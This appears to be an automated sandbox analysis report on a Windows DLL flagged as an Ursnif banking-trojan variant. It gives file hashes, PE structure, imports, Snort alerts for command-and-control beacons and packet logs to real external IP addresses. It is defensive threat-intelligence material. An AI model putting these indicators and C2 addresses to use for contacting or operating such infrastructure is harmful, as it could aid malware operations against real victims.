SHA-512:	26800F9733BF8608CB4BF2C24592BDA4092458DC12E2B707C5503956015600540CF36114916E5696D997FDB72896332A3014664287BC26840D9D79B40F9CC19A
Malicious:	false
Reputation:	low
Preview:	regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................e..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.8361821028758083
Encrypted:	false
SSDEEP:	384:Zwb5uZrdgdXX5gQp8XXLnxOf2oMPmxwp95GjZmGuADTTeW5N5oAR1V:mlcreXXZpigf2ovxwp3WmGuuTeSN51R1
MD5:	498211172CBFC34A13FD2E9630E30A11
SHA1:	7413547E9D96756DF22533A3E31E05F5996C75CC
SHA-256:	6B575ABA2719D1440DCAFECBA4C5FBA11673407180D636A18D597189984D0B21
SHA-512:	2E58314560305ECCCEFA4377EA207FC5B825E2B55E4F2AA1314355E89E44C2D2AFF62D830A82B8D3731E3650AC473C79E19A5A79C0F6DB0D71132481E69CAC90
Malicious:	false
Reputation:	low
Preview:	regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................e..HvLE.^......P...............}JB...l..+\|.............................. ..hbin................p.\..,..........nk,..(..........X........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..(.......... ...........P............... .......Z.......................Root........lf......Root....nk ..(.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.882756524717819
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 97.97% Win32 Executable Delphi generic (14689/80) 1.44% Win16/32 Executable Delphi generic (2074/23) 0.20% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20%
File name:	hFGZpat9Mf.dll
File size:	655360
MD5:	9acde2c3e3a375590a1bc716eabc52c5
SHA1:	e231c9ae802a9aad9916f08256f7558f531d54ce
SHA256:	57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
SHA512:	3c282a6dac4c1a655a6851ef7bcf9d336603614216f93e8bde031697118439081b113bb71473e2939b30225fa684d56d9dbc80bd888cc3312b167c7bef130946
SSDEEP:	12288:CxdKNJ2yElIM31TVlVPt0+JQjahIx9Q2oleUcUGHS:CwuyElIMlTzBt0Bp3seBU
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	b99988fcd4f66e0f

Static PE Info

General

Entrypoint:	0x46b448
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7f3476b35f56feee8663a4d549e47d9e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
mov eax, 0046B028h
call 00007F8E18CB1738h
push 0046BDF8h
call 00007F8E18CB1A8Ah
push 0046BDF8h
call 00007F8E18CB1A80h
push 0046BDF8h
call 00007F8E18CB1A76h
push 0046BDF8h
call 00007F8E18CB1A6Ch
push 0046BDF8h
call 00007F8E18CB1A62h
push 0046BDF8h
call 00007F8E18CB1A58h
push 0046BDF8h
call 00007F8E18CB1A4Eh
push 0046BDF8h
call 00007F8E18CB1A44h
push 0046BDF8h
call 00007F8E18CB1A3Ah
push 0046BDF8h
call 00007F8E18CB1A30h
push 0046BDF8h
call 00007F8E18CB1A26h
push 0046BDF8h
call 00007F8E18CB1A1Ch
push 0046BDF8h
call 00007F8E18CB1A12h
push 0046BDF8h
call 00007F8E18CB1A08h
push 0046BDF8h
call 00007F8E18CB19FEh
push 0046BDF8h
call 00007F8E18CB19F4h
push 0046BDF8h
call 00007F8E18CB19EAh
push 0046BDF8h
call 00007F8E18CB19E0h
push 0000BDF8h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x70000	0x2172	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7a000	0x29600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x73000	0x6e18	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x6ae04	0x6b000	False	0.529191917348	data	6.56713483483	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x6c000	0x2324	0x2400	False	0.465928819444	data	4.93971870671	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0x6f000	0xf55	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x70000	0x2172	0x2200	False	0.365349264706	data	4.98625501899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x73000	0x6e18	0x7000	False	0.615618024554	data	6.66070715654	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x7a000	0x29600	0x29600	False	0.458589029456	data	6.73870167703	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x7bd68	0x134	data
RT_CURSOR	0x7be9c	0x134	data
RT_CURSOR	0x7bfd0	0x134	data
RT_CURSOR	0x7c104	0x134	data
RT_CURSOR	0x7c238	0x134	data
RT_CURSOR	0x7c36c	0x134	data
RT_CURSOR	0x7c4a0	0x134	data
RT_BITMAP	0x7c5d4	0x1d0	data
RT_BITMAP	0x7c7a4	0x1e4	data
RT_BITMAP	0x7c988	0x1d0	data
RT_BITMAP	0x7cb58	0x1d0	data
RT_BITMAP	0x7cd28	0x1d0	data
RT_BITMAP	0x7cef8	0x1d0	data
RT_BITMAP	0x7d0c8	0x1d0	data
RT_BITMAP	0x7d298	0x1d0	data
RT_BITMAP	0x7d468	0x1d0	data
RT_BITMAP	0x7d638	0x1d0	data
RT_BITMAP	0x7d808	0xe8	GLS_BINARY_LSB_FIRST
RT_ICON	0x7d8f0	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 49, next used block 48059	English	United States
RT_DIALOG	0x7dbd8	0x52	data
RT_STRING	0x7dc2c	0x15c	data
RT_STRING	0x7dd88	0x3e4	data
RT_STRING	0x7e16c	0x340	data
RT_STRING	0x7e4ac	0x354	data
RT_STRING	0x7e800	0x230	data
RT_STRING	0x7ea30	0x1d4	data
RT_STRING	0x7ec04	0xec	data
RT_STRING	0x7ecf0	0x2fc	data
RT_STRING	0x7efec	0xd4	data
RT_STRING	0x7f0c0	0x110	data
RT_STRING	0x7f1d0	0x24c	data
RT_STRING	0x7f41c	0x3f8	data
RT_STRING	0x7f814	0x360	data
RT_STRING	0x7fb74	0x3e8	data
RT_STRING	0x7ff5c	0x234	data
RT_STRING	0x80190	0xec	data
RT_STRING	0x8027c	0x1b4	data
RT_STRING	0x80430	0x3e4	data
RT_STRING	0x80814	0x358	data
RT_STRING	0x80b6c	0x2b4	data
RT_RCDATA	0x80e20	0x10	data
RT_RCDATA	0x80e30	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors	Bulgarian	Bulgaria
RT_RCDATA	0x81130	0x104	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81234	0x10b	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81340	0xed	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81430	0xe4	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81514	0xfe	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81614	0x96	GIF image data, version 89a, 24 x 24	Bulgarian	Bulgaria
RT_RCDATA	0x816ac	0x10c	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x817b8	0x105	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x818c0	0x102	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x819c4	0xfb	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81ac0	0x10e	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81bd0	0x105	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81cd8	0x100	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81dd8	0xfc	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81ed4	0x113	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x81fe8	0x10e	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x820f8	0x106	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x82200	0xfd	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x82300	0x115	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x82418	0x113	GIF image data, version 89a, 22 x 22	Bulgarian	Bulgaria
RT_RCDATA	0x8252c	0x229	HTML document, ASCII text, with CRLF, CR line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x82758	0x3f	GIF image data, version 89a, 12 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82798	0x6e	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82808	0x50	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82858	0x6c	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x828c4	0x4f	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82914	0x6f	GIF image data, version 89a, 17 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82984	0x41	GIF image data, version 89a, 15 x 15	Bulgarian	Bulgaria
RT_RCDATA	0x829c8	0x3c	GIF image data, version 89a, 16 x 12	Bulgarian	Bulgaria
RT_RCDATA	0x82a04	0x69	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82a70	0x4d	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82ac0	0x71	GIF image data, version 89a, 16 x 17	Bulgarian	Bulgaria
RT_RCDATA	0x82b34	0x69	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82ba0	0x4d	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82bf0	0x12c	GIF image data, version 89a, 10 x 12	Bulgarian	Bulgaria
RT_RCDATA	0x82d1c	0x129	GIF image data, version 89a, 10 x 12	Bulgarian	Bulgaria
RT_RCDATA	0x82e48	0x91	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82edc	0x82	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82f60	0x75	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x82fd8	0x9e	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x83078	0x7c	GIF image data, version 89a, 16 x 16	Bulgarian	Bulgaria
RT_RCDATA	0x830f4	0x36	GIF image data, version 89a, 1 x 1	Bulgarian	Bulgaria
RT_RCDATA	0x8312c	0xea6	HTML document, ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x83fd4	0x2b9f	ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x86b74	0x4e98	ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x8ba0c	0x539	ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x8bf48	0x1d08	HTML document, ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x8dc50	0x61b	ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x8e26c	0x671	ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x8e8e0	0x7e61	ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x96744	0xd59	HTML document, ASCII text, with CRLF line terminators	Bulgarian	Bulgaria
RT_RCDATA	0x974a0	0x664	data
RT_RCDATA	0x97b04	0x1c9	Delphi compiled form 'Tgj3eo9f8hwe89fq'
RT_RCDATA	0x97cd0	0xb804	data	English	United States
RT_GROUP_CURSOR	0xa34d4	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xa34e8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xa34fc	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xa3510	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xa3524	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xa3538	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xa354c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0xa3560	0x14	data	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StrokePath, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll	CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Bulgarian	Bulgaria

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/26/22-17:03:29.526106	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49753	80	192.168.2.5	13.107.42.16
01/26/22-17:03:50.217694	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49758	80	192.168.2.5	194.76.226.200
01/26/22-17:04:11.131587	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49771	80	192.168.2.5	211.119.84.112
01/26/22-17:04:11.131587	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49771	80	192.168.2.5	211.119.84.112
01/26/22-17:04:32.817920	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49781	80	192.168.2.5	41.41.255.235
01/26/22-17:04:53.808751	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49812	80	192.168.2.5	31.214.157.187
01/26/22-17:04:53.808751	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49812	80	192.168.2.5	31.214.157.187
01/26/22-17:05:14.219179	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49814	80	192.168.2.5	13.107.43.16
01/26/22-17:05:55.173450	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49825	80	192.168.2.5	181.129.180.251
01/26/22-17:06:16.920281	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49827	80	192.168.2.5	61.36.14.230
01/26/22-17:06:38.188650	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49828	80	192.168.2.5	31.214.157.187
01/26/22-17:06:59.014573	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49829	80	192.168.2.5	13.107.43.16
01/26/22-17:06:59.014573	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49829	80	192.168.2.5	13.107.43.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2022 17:03:50.196054935 CET	49758	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:03:50.216969967 CET	80	49758	194.76.226.200	192.168.2.5
Jan 26, 2022 17:03:50.217222929 CET	49758	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:03:50.217694044 CET	49758	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:03:50.240555048 CET	80	49758	194.76.226.200	192.168.2.5
Jan 26, 2022 17:03:50.485863924 CET	80	49758	194.76.226.200	192.168.2.5
Jan 26, 2022 17:03:50.527489901 CET	49758	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:04:10.823165894 CET	49771	80	192.168.2.5	211.119.84.112
Jan 26, 2022 17:04:11.131019115 CET	80	49771	211.119.84.112	192.168.2.5
Jan 26, 2022 17:04:11.131146908 CET	49771	80	192.168.2.5	211.119.84.112
Jan 26, 2022 17:04:11.131587029 CET	49771	80	192.168.2.5	211.119.84.112
Jan 26, 2022 17:04:11.641944885 CET	80	49771	211.119.84.112	192.168.2.5
Jan 26, 2022 17:04:12.363171101 CET	80	49771	211.119.84.112	192.168.2.5
Jan 26, 2022 17:04:12.363260984 CET	80	49771	211.119.84.112	192.168.2.5
Jan 26, 2022 17:04:12.363360882 CET	49771	80	192.168.2.5	211.119.84.112
Jan 26, 2022 17:04:12.363540888 CET	49771	80	192.168.2.5	211.119.84.112
Jan 26, 2022 17:04:12.671621084 CET	80	49771	211.119.84.112	192.168.2.5
Jan 26, 2022 17:04:32.723215103 CET	49781	80	192.168.2.5	41.41.255.235
Jan 26, 2022 17:04:32.817071915 CET	80	49781	41.41.255.235	192.168.2.5
Jan 26, 2022 17:04:32.817342997 CET	49781	80	192.168.2.5	41.41.255.235
Jan 26, 2022 17:04:32.817919970 CET	49781	80	192.168.2.5	41.41.255.235
Jan 26, 2022 17:04:33.109745026 CET	80	49781	41.41.255.235	192.168.2.5
Jan 26, 2022 17:04:33.531102896 CET	80	49781	41.41.255.235	192.168.2.5
Jan 26, 2022 17:04:33.531539917 CET	80	49781	41.41.255.235	192.168.2.5
Jan 26, 2022 17:04:33.531630993 CET	49781	80	192.168.2.5	41.41.255.235
Jan 26, 2022 17:04:33.531966925 CET	49781	80	192.168.2.5	41.41.255.235
Jan 26, 2022 17:04:33.613989115 CET	80	49781	41.41.255.235	192.168.2.5
Jan 26, 2022 17:04:53.780751944 CET	49812	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:04:53.807960033 CET	80	49812	31.214.157.187	192.168.2.5
Jan 26, 2022 17:04:53.808163881 CET	49812	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:04:53.808751106 CET	49812	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:04:53.835407972 CET	80	49812	31.214.157.187	192.168.2.5
Jan 26, 2022 17:04:54.068263054 CET	80	49812	31.214.157.187	192.168.2.5
Jan 26, 2022 17:04:54.110872984 CET	49812	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:04:55.488312960 CET	80	49758	194.76.226.200	192.168.2.5
Jan 26, 2022 17:04:55.489257097 CET	49758	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:04:55.489376068 CET	49758	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:04:55.509185076 CET	80	49758	194.76.226.200	192.168.2.5
Jan 26, 2022 17:05:19.442369938 CET	49812	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:05:19.469677925 CET	80	49812	31.214.157.187	192.168.2.5
Jan 26, 2022 17:05:19.469788074 CET	49812	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:05:34.284610987 CET	49816	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:05:34.305545092 CET	80	49816	194.76.226.200	192.168.2.5
Jan 26, 2022 17:05:34.307151079 CET	49816	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:05:34.308445930 CET	49816	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:05:34.328700066 CET	80	49816	194.76.226.200	192.168.2.5
Jan 26, 2022 17:05:34.582305908 CET	80	49816	194.76.226.200	192.168.2.5
Jan 26, 2022 17:05:34.735786915 CET	49816	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:05:54.993796110 CET	49825	80	192.168.2.5	181.129.180.251
Jan 26, 2022 17:05:55.171062946 CET	80	49825	181.129.180.251	192.168.2.5
Jan 26, 2022 17:05:55.171247959 CET	49825	80	192.168.2.5	181.129.180.251
Jan 26, 2022 17:05:55.173449993 CET	49825	80	192.168.2.5	181.129.180.251
Jan 26, 2022 17:05:55.585179090 CET	80	49825	181.129.180.251	192.168.2.5
Jan 26, 2022 17:05:56.107831001 CET	80	49825	181.129.180.251	192.168.2.5
Jan 26, 2022 17:05:56.107940912 CET	80	49825	181.129.180.251	192.168.2.5
Jan 26, 2022 17:05:56.108086109 CET	49825	80	192.168.2.5	181.129.180.251
Jan 26, 2022 17:05:56.108222008 CET	49825	80	192.168.2.5	181.129.180.251
Jan 26, 2022 17:05:56.284883976 CET	80	49825	181.129.180.251	192.168.2.5
